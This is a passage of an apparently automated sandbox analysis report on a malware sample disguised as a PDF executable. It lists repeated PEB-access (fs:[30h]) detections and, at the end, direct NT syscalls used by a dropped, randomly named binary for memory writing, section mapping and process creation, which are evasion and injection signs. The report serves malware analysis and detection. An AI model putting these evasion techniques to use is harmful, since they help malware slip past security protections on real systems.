        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h]2_2_36B0B1E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h]2_2_36B0B1E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h]2_2_36B0B1E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD91F0 mov eax, dword ptr fs:[00000030h]2_2_36AD91F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD91F0 mov eax, dword ptr fs:[00000030h]2_2_36AD91F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h]2_2_36AF51C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h]2_2_36AF51C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h]2_2_36AF51C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h]2_2_36AF51C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F13E mov eax, dword ptr fs:[00000030h]2_2_36B9F13E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3136 mov eax, dword ptr fs:[00000030h]2_2_36BB3136
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B17128 mov eax, dword ptr fs:[00000030h]2_2_36B17128
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B17128 mov eax, dword ptr fs:[00000030h]2_2_36B17128
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE510D mov eax, dword ptr fs:[00000030h]2_2_36AE510D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h]2_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h]2_2_36B0510F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B3717A mov eax, dword ptr fs:[00000030h]2_2_36B3717A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B3717A mov eax, dword ptr fs:[00000030h]2_2_36B3717A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1716D mov eax, dword ptr fs:[00000030h]2_2_36B1716D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3157 mov eax, dword ptr fs:[00000030h]2_2_36BB3157
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3157 mov eax, dword ptr fs:[00000030h]2_2_36BB3157
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3157 mov eax, dword ptr fs:[00000030h]2_2_36BB3157
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB5149 mov eax, dword ptr fs:[00000030h]2_2_36BB5149
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7D140 mov eax, dword ptr fs:[00000030h]2_2_36B7D140
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7D140 mov eax, dword ptr fs:[00000030h]2_2_36B7D140
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7314A mov eax, dword ptr fs:[00000030h]2_2_36B7314A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7314A mov eax, dword ptr fs:[00000030h]2_2_36B7314A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7314A mov eax, dword ptr fs:[00000030h]2_2_36B7314A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7314A mov eax, dword ptr fs:[00000030h]2_2_36B7314A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov eax, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov eax, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov eax, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB2 mov eax, dword ptr fs:[00000030h]2_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB7EA4 mov eax, dword ptr fs:[00000030h]2_2_36BB7EA4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB7EA4 mov ecx, dword ptr fs:[00000030h]2_2_36BB7EA4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB7EA4 mov eax, dword ptr fs:[00000030h]2_2_36BB7EA4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB7EA4 mov eax, dword ptr fs:[00000030h]2_2_36BB7EA4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0BE80 mov eax, dword ptr fs:[00000030h]2_2_36B0BE80
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B83EFC mov eax, dword ptr fs:[00000030h]2_2_36B83EFC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3EE2 mov eax, dword ptr fs:[00000030h]2_2_36AE3EE2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B11EED mov eax, dword ptr fs:[00000030h]2_2_36B11EED
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B11EED mov eax, dword ptr fs:[00000030h]2_2_36B11EED
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B11EED mov eax, dword ptr fs:[00000030h]2_2_36B11EED
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1BED0 mov eax, dword ptr fs:[00000030h]2_2_36B1BED0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA9ED2 mov eax, dword ptr fs:[00000030h]2_2_36BA9ED2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B87ED0 mov ecx, dword ptr fs:[00000030h]2_2_36B87ED0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21ED8 mov eax, dword ptr fs:[00000030h]2_2_36B21ED8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB5ECF mov eax, dword ptr fs:[00000030h]2_2_36BB5ECF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B67EC3 mov eax, dword ptr fs:[00000030h]2_2_36B67EC3
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B67EC3 mov ecx, dword ptr fs:[00000030h]2_2_36B67EC3
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h]2_2_36B75E30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B75E30 mov ecx, dword ptr fs:[00000030h]2_2_36B75E30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h]2_2_36B75E30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h]2_2_36B75E30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h]2_2_36B75E30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h]2_2_36B75E30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FE1F mov eax, dword ptr fs:[00000030h]2_2_36B5FE1F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FE1F mov eax, dword ptr fs:[00000030h]2_2_36B5FE1F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FE1F mov eax, dword ptr fs:[00000030h]2_2_36B5FE1F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FE1F mov eax, dword ptr fs:[00000030h]2_2_36B5FE1F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3E01 mov eax, dword ptr fs:[00000030h]2_2_36AE3E01
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADBE18 mov ecx, dword ptr fs:[00000030h]2_2_36ADBE18
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3E14 mov eax, dword ptr fs:[00000030h]2_2_36AE3E14
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3E14 mov eax, dword ptr fs:[00000030h]2_2_36AE3E14
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3E14 mov eax, dword ptr fs:[00000030h]2_2_36AE3E14
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B17E71 mov eax, dword ptr fs:[00000030h]2_2_36B17E71
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADBE60 mov eax, dword ptr fs:[00000030h]2_2_36ADBE60
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADBE60 mov eax, dword ptr fs:[00000030h]2_2_36ADBE60
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1E70 mov eax, dword ptr fs:[00000030h]2_2_36AE1E70
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5DE50 mov eax, dword ptr fs:[00000030h]2_2_36B5DE50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5DE50 mov eax, dword ptr fs:[00000030h]2_2_36B5DE50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5DE50 mov ecx, dword ptr fs:[00000030h]2_2_36B5DE50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5DE50 mov eax, dword ptr fs:[00000030h]2_2_36B5DE50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5DE50 mov eax, dword ptr fs:[00000030h]2_2_36B5DE50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADDE45 mov eax, dword ptr fs:[00000030h]2_2_36ADDE45
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADDE45 mov ecx, dword ptr fs:[00000030h]2_2_36ADDE45
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADFE40 mov eax, dword ptr fs:[00000030h]2_2_36ADFE40
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB5E56 mov eax, dword ptr fs:[00000030h]2_2_36BB5E56
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1FAA mov eax, dword ptr fs:[00000030h]2_2_36AE1FAA
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0BF93 mov eax, dword ptr fs:[00000030h]2_2_36B0BF93
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h]2_2_36B5FFDC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h]2_2_36B5FFDC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h]2_2_36B5FFDC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FFDC mov ecx, dword ptr fs:[00000030h]2_2_36B5FFDC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h]2_2_36B5FFDC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h]2_2_36B5FFDC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADBFC0 mov eax, dword ptr fs:[00000030h]2_2_36ADBFC0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B99FD6 mov eax, dword ptr fs:[00000030h]2_2_36B99FD6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD9FD0 mov eax, dword ptr fs:[00000030h]2_2_36AD9FD0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h]2_2_36B61FC9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFDF36 mov eax, dword ptr fs:[00000030h]2_2_36AFDF36
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFDF36 mov eax, dword ptr fs:[00000030h]2_2_36AFDF36

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtAllocateVirtualMemory: Direct from: 0x7756480CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtClose: Direct from: 0x77562A8C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtCreateKey: Direct from: 0x77562B8CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtSetInformationThread: Direct from: 0x77562A6CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtQueryAttributesFile: Direct from: 0x77562D8CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtOpenKeyEx: Direct from: 0x77562ABCJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtQueryInformationProcess: Direct from: 0x77562B46Jump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtResumeThread: Direct from: 0x77562EDCJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtCreateUserProcess: Direct from: 0x7756363CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtProtectVirtualMemory: Direct from: 0x77562EBCJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtWriteVirtualMemory: Direct from: 0x7756482CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtDelayExecution: Direct from: 0x77562CFCJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtWriteVirtualMemory: Direct from: 0x77562D5CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtMapViewOfSection: Direct from: 0x77562C3CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtResumeThread: Direct from: 0x775635CCJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtAllocateVirtualMemory: Direct from: 0x77562B1CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtReadFile: Direct from: 0x775629FCJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtQuerySystemInformation: Direct from: 0x77562D1CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtSetInformationProcess: Direct from: 0x77562B7CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtNotifyChangeKey: Direct from: 0x77563B4CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtOpenFile: Direct from: 0x77562CECJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtAllocateVirtualMemory: Direct from: 0x77563BBCJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtSetInformationThread: Direct from: 0x77556319Jump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtQueryInformationToken: Direct from: 0x77562BCCJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtReadVirtualMemory: Direct from: 0x77562DACJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtCreateFile: Direct from: 0x77562F0CJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtProtectVirtualMemory: Direct from: 0x77557A4EJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeNtQueryVolumeInformationFile: Direct from: 0x77562E4CJump to behavior
